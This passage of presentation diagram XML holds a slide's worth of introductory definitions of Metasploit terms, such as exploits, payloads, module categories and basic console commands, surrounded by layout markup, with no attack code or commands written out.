    <dgm:pt modelId="{7DF1C796-21A1-4922-98F3-DAD725B0C2DE}" type="pres">
      <dgm:prSet presAssocID="{EC66D02A-5A22-4B0B-B09C-33A83E6AEE40}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9EC38E05-115D-4F36-B992-DC0B1770D079}" type="pres">
      <dgm:prSet presAssocID="{8573465F-7E9C-4F8C-9584-4ACE89DB0FC9}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EDB866F6-1F51-4F20-98C6-F7B4DB97EA2D}" type="pres">
      <dgm:prSet presAssocID="{A9DEE684-1ACF-4CF2-8234-880F69897954}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F9D16AD3-3F96-484D-8456-75030B963F25}" type="pres">
      <dgm:prSet presAssocID="{2A63675E-17D2-4758-AEC9-00E120F6F7D0}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B9D060DD-8E2B-4A0C-8DC5-58AC26111184}" type="pres">
      <dgm:prSet presAssocID="{6D725EC2-40E0-45A5-9A9D-A2ECE71F7AAB}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{317F195C-42E4-4224-84B2-8297EAD70C48}" type="pres">
      <dgm:prSet presAssocID="{A28B39E1-1EAF-4A55-87E1-36F7F34C5E3C}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30706354-438C-46A6-B64D-19293FA3DB25}" type="pres">
      <dgm:prSet presAssocID="{DE670228-4136-4FF9-839E-9569591B4F46}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AC29063F-D122-484F-B6DE-B6AD6588869E}" type="pres">
      <dgm:prSet presAssocID="{2717862E-B7E0-41F2-AAEA-DD4258DC2F99}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EBB49653-41C2-45C8-B287-7C49446E7483}" type="pres">
      <dgm:prSet presAssocID="{AB970D74-91F1-4F49-8537-458188927989}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{DB8EABC3-344D-4E55-85A3-4EFAA3567E29}" type="pres">
      <dgm:prSet presAssocID="{C70209A0-77B9-4F6A-87D9-BD7471CB2D80}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52E4B533-5A59-45EB-9D81-8825B2BCBC01}" type="pres">
      <dgm:prSet presAssocID="{B82D20A2-7666-40A1-87CC-75E7381F04CE}" presName="parentText" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F389DC4E-5057-4B5A-9E09-84024237E162}" type="pres">
      <dgm:prSet presAssocID="{9F25BB13-2303-4998-810E-442DC8B22580}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{05EC6760-5BAA-4A0C-BF8B-26665C1A5594}" type="pres">
      <dgm:prSet presAssocID="{CDC4C92D-9D3C-43D6-A328-8ED1A922499C}" presName="parentText" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{E30A1202-1AB6-48DE-AAB3-0F15BA412A70}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{AB970D74-91F1-4F49-8537-458188927989}" srcOrd="5" destOrd="0" parTransId="{04331F20-7E80-4AE0-A504-931B7759E57C}" sibTransId="{C70209A0-77B9-4F6A-87D9-BD7471CB2D80}"/>
    <dgm:cxn modelId="{58E3C71C-82FB-42F5-94C4-2A4577169945}" type="presOf" srcId="{7C79C5E2-22DB-492F-918E-4381259D74DC}" destId="{C4574B46-B3AB-420C-9ACE-8FB24A04CA82}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{1385431E-0242-4B28-BB80-2DC4DF9CE3FD}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{CDC4C92D-9D3C-43D6-A328-8ED1A922499C}" srcOrd="7" destOrd="0" parTransId="{043AEA94-C1A9-4EC5-A44F-BA46C59DB550}" sibTransId="{9250E001-5C44-4DB7-8501-1FE7B7D6EB29}"/>
    <dgm:cxn modelId="{AA88DE23-7BAE-4766-8687-C84E7EA2E4DC}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{EC66D02A-5A22-4B0B-B09C-33A83E6AEE40}" srcOrd="1" destOrd="0" parTransId="{5C3CA703-C1E0-4164-A4CC-93F22DED029D}" sibTransId="{8573465F-7E9C-4F8C-9584-4ACE89DB0FC9}"/>
    <dgm:cxn modelId="{36229224-87C8-4FDE-BC8D-C0E5EE88FC24}" type="presOf" srcId="{CDC4C92D-9D3C-43D6-A328-8ED1A922499C}" destId="{05EC6760-5BAA-4A0C-BF8B-26665C1A5594}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{D55BB032-6511-448B-9BAF-801F8858D1AC}" type="presOf" srcId="{EC66D02A-5A22-4B0B-B09C-33A83E6AEE40}" destId="{7DF1C796-21A1-4922-98F3-DAD725B0C2DE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{AEEA7035-C499-4B31-AB1F-D0755F3D3D91}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{6D725EC2-40E0-45A5-9A9D-A2ECE71F7AAB}" srcOrd="3" destOrd="0" parTransId="{EF6EE85E-7A7E-430C-B511-6678D623B7B9}" sibTransId="{A28B39E1-1EAF-4A55-87E1-36F7F34C5E3C}"/>
    <dgm:cxn modelId="{079BA937-0DEB-4754-951A-4C8117288018}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{DE670228-4136-4FF9-839E-9569591B4F46}" srcOrd="4" destOrd="0" parTransId="{A3A7140A-BAAC-4E7D-851F-3256036E5504}" sibTransId="{2717862E-B7E0-41F2-AAEA-DD4258DC2F99}"/>
    <dgm:cxn modelId="{5E98F564-3103-4459-9796-4F5C08AE4C8E}" type="presOf" srcId="{A9DEE684-1ACF-4CF2-8234-880F69897954}" destId="{EDB866F6-1F51-4F20-98C6-F7B4DB97EA2D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8E18F449-2DDB-4EFE-8550-00C5EDB4A890}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{7C79C5E2-22DB-492F-918E-4381259D74DC}" srcOrd="0" destOrd="0" parTransId="{A317EA6A-2698-4ED5-8EF5-CE0C32065B56}" sibTransId="{C1CCB6E6-223C-4724-AF49-D844CB24A1AB}"/>
    <dgm:cxn modelId="{3D38206E-E04C-46A8-97BB-33C661098E65}" type="presOf" srcId="{B82D20A2-7666-40A1-87CC-75E7381F04CE}" destId="{52E4B533-5A59-45EB-9D81-8825B2BCBC01}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{305EB658-145B-4A96-954E-FAC793283F5F}" type="presOf" srcId="{6D725EC2-40E0-45A5-9A9D-A2ECE71F7AAB}" destId="{B9D060DD-8E2B-4A0C-8DC5-58AC26111184}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{002B65AC-7039-4BF6-B129-DED1E3C41DC0}" type="presOf" srcId="{AB970D74-91F1-4F49-8537-458188927989}" destId="{EBB49653-41C2-45C8-B287-7C49446E7483}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DD3114B1-60FF-41B9-B8EC-A09B988A0845}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{B82D20A2-7666-40A1-87CC-75E7381F04CE}" srcOrd="6" destOrd="0" parTransId="{5AE90DCC-C7BD-4ACD-9287-91B095D7B3A3}" sibTransId="{9F25BB13-2303-4998-810E-442DC8B22580}"/>
    <dgm:cxn modelId="{A1A37AB9-1372-4963-8880-EFF785D4F323}" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{A9DEE684-1ACF-4CF2-8234-880F69897954}" srcOrd="2" destOrd="0" parTransId="{3FEE2CF3-84E2-4B44-AF66-0008913B273A}" sibTransId="{2A63675E-17D2-4758-AEC9-00E120F6F7D0}"/>
    <dgm:cxn modelId="{15ACBBBE-DFD4-4299-977A-543E3373C387}" type="presOf" srcId="{DE670228-4136-4FF9-839E-9569591B4F46}" destId="{30706354-438C-46A6-B64D-19293FA3DB25}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{C27175C7-3E72-4E41-AFBD-82C11FE63151}" type="presOf" srcId="{43B4467E-CDAD-4A92-86B3-460FFE556520}" destId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{98C38AE3-EA75-4CBF-809A-B7B82687F5B8}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{C4574B46-B3AB-420C-9ACE-8FB24A04CA82}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{48DFCBAC-9314-47F6-B1DE-9030F761BB8D}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{A8BA7C88-E234-4D1C-BE18-25C9F8C5B15A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7A1AD195-D7DA-42C7-A708-2EC19C6A2502}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{7DF1C796-21A1-4922-98F3-DAD725B0C2DE}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DF6E2255-3E69-4D46-B073-234259A0519E}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{9EC38E05-115D-4F36-B992-DC0B1770D079}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{54F6091C-131C-470A-AC86-A301FC32F924}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{EDB866F6-1F51-4F20-98C6-F7B4DB97EA2D}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{E3E3783A-6D56-430A-9DA1-CF8AC42E0CF5}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{F9D16AD3-3F96-484D-8456-75030B963F25}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{3FA0D2BB-95F2-4C50-AD69-1A78DB7FFAB4}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{B9D060DD-8E2B-4A0C-8DC5-58AC26111184}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{FFBC2779-2D71-4CAC-A45B-7A83ED3ED205}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{317F195C-42E4-4224-84B2-8297EAD70C48}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6002E133-E97D-4D3E-92FE-9EBA8DE6A908}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{30706354-438C-46A6-B64D-19293FA3DB25}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{DA511E7A-0D3E-407B-844C-2AA8FAFEB5DD}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{AC29063F-D122-484F-B6DE-B6AD6588869E}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{6C5563C0-2635-4175-8451-27567341A957}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{EBB49653-41C2-45C8-B287-7C49446E7483}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{62C28F99-CD8B-4C3C-AD6D-9172F0868C1F}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{DB8EABC3-344D-4E55-85A3-4EFAA3567E29}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{90550111-2E8C-4EAF-9E53-A59E534B1157}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{52E4B533-5A59-45EB-9D81-8825B2BCBC01}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{F2936B07-C41F-4191-9DF3-4128457CF352}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{F389DC4E-5057-4B5A-9E09-84024237E162}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8A4316DE-2BF0-4CB8-837D-6D5FC1EC24AF}" type="presParOf" srcId="{D39805BD-11A7-42C8-8EBB-8DB7D8F2A96E}" destId="{05EC6760-5BAA-4A0C-BF8B-26665C1A559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686287-C283-4BF0-83F3-1200E04A733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3FAC53B-E4FB-4DCA-A92B-AB739F0F082E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0" dirty="0"/>
            <a:t>exploits:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0" dirty="0"/>
            <a:t> Code that takes advantage of system vulnerabilities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E0F402D-CEF5-4AEC-92E0-E4468E94BB6F}" type="parTrans" cxnId="{E9F3D72E-7B46-485B-9830-5D74B38AF6CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6A4C218-910E-4AA6-846F-F3EF8D036910}" type="sibTrans" cxnId="{E9F3D72E-7B46-485B-9830-5D74B38AF6CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5558BCEC-06BD-482C-9223-A5A7E8715D0D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Payloads:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Code executed on the target system (e.g., getting a shell).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DE39B831-8160-45B6-9F6B-8B8B2D17A2AF}" type="parTrans" cxnId="{AC44DB4B-4338-49BB-A25B-964743E6BD8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4E553751-5429-45D5-9B9A-6A005E0EB3EE}" type="sibTrans" cxnId="{AC44DB4B-4338-49BB-A25B-964743E6BD8A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{329FD0B2-58A8-47F1-B14C-2FA2ACE28716}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Module Categories:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{714E40BE-4691-45A6-ADD0-5A730478B412}" type="parTrans" cxnId="{C92FE4E2-69E7-44FE-9742-836CC3DD1908}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02F620E1-BAA7-4DE3-83C0-AA0E5747B20C}" type="sibTrans" cxnId="{C92FE4E2-69E7-44FE-9742-836CC3DD1908}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{381DF832-8D96-4523-B0A9-86E5231B5204}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Auxiliary:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Scanners, fuzzers.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3135121C-765B-4731-89CD-2054EC1D506E}" type="parTrans" cxnId="{D8C07362-FCD1-4049-8199-E6FB2A64029B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{99C1A353-FBD3-4FC4-AA8B-61DEF30D9DAA}" type="sibTrans" cxnId="{D8C07362-FCD1-4049-8199-E6FB2A64029B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9A33BD5-937A-460A-A6B7-0569FA3BFE2A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Encoders &amp; Evasion:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> For obfuscation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6FCA302E-1CB6-4972-904D-640EDBBFEA02}" type="parTrans" cxnId="{7EC0968F-BB58-47FA-9798-0039BB0F2F52}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DD837FD5-FB21-4E46-A04C-E7666ECA1A4A}" type="sibTrans" cxnId="{7EC0968F-BB58-47FA-9798-0039BB0F2F52}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2ECA8F91-3892-4B56-9B74-CBE5F05191A4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>NOPs:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Used as buffers in payloads.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3938C548-010B-4C29-8F81-08723059A253}" type="parTrans" cxnId="{F24C6BAA-E230-48BE-BE06-ACDECED70821}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33C24520-CC0E-4D38-A18B-A1068AA95493}" type="sibTrans" cxnId="{F24C6BAA-E230-48BE-BE06-ACDECED70821}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DFFDEAFF-4D0B-44C0-AF25-53A51FF300A7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Payloads:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t> Self-contained, staged, or split into stagers and stages.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4BE0219-C288-4736-828F-730E70147926}" type="parTrans" cxnId="{3C4F8253-0966-4D2C-AF86-47FA9B01B969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F33125F4-B3A7-45A4-AF97-F76B8AA4F367}" type="sibTrans" cxnId="{3C4F8253-0966-4D2C-AF86-47FA9B01B969}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65F63F45-70D5-4A65-8A13-F95973B3A640}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="1" i="0" baseline="0"/>
            <a:t>Metasploit Commands:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FCB238D3-EC65-47C7-8C5C-2673869FECE9}" type="parTrans" cxnId="{A43FD873-3085-4281-84FC-43789281B6E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{805F1243-4C19-409D-8925-D880BFD6B0B1}" type="sibTrans" cxnId="{A43FD873-3085-4281-84FC-43789281B6E7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{49D04F8C-9DB1-48C8-BC9F-8DCF136A7B8C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" b="0" i="0" baseline="0"/>
            <a:t>use to select modules, search for exploits, exploit to run, set to configure parameters.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2621FC81-6EE5-433C-BF27-D5577F046C6A}" type="parTrans" cxnId="{43C7D459-B544-410E-8585-C4FA8D8609D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E9739069-9C5A-447F-854B-2D28BB687823}" type="sibTrans" cxnId="{43C7D459-B544-410E-8585-C4FA8D8609D8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FC0F9E4-E367-4B6D-92AB-7092E8DB11E0}" type="pres">
      <dgm:prSet presAssocID="{26686287-C283-4BF0-83F3-1200E04A733D}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FB3445E7-0C1B-42EE-9E74-F0D08A64DF81}" type="pres">
      <dgm:prSet presAssocID="{E3FAC53B-E4FB-4DCA-A92B-AB739F0F082E}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78EBF2F6-3000-4543-824F-EE491F3E9B02}" type="pres">
      <dgm:prSet presAssocID="{E6A4C218-910E-4AA6-846F-F3EF8D036910}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{562DBC2E-BA9C-413A-96B2-DA091289F5C4}" type="pres">
      <dgm:prSet presAssocID="{5558BCEC-06BD-482C-9223-A5A7E8715D0D}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8FAC889B-DC2B-476F-BF6B-8AFE6AC2CD39}" type="pres">
      <dgm:prSet presAssocID="{4E553751-5429-45D5-9B9A-6A005E0EB3EE}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8A66F3D3-0304-4741-A8A6-36A2C97DB8D9}" type="pres">
      <dgm:prSet presAssocID="{329FD0B2-58A8-47F1-B14C-2FA2ACE28716}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="9">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
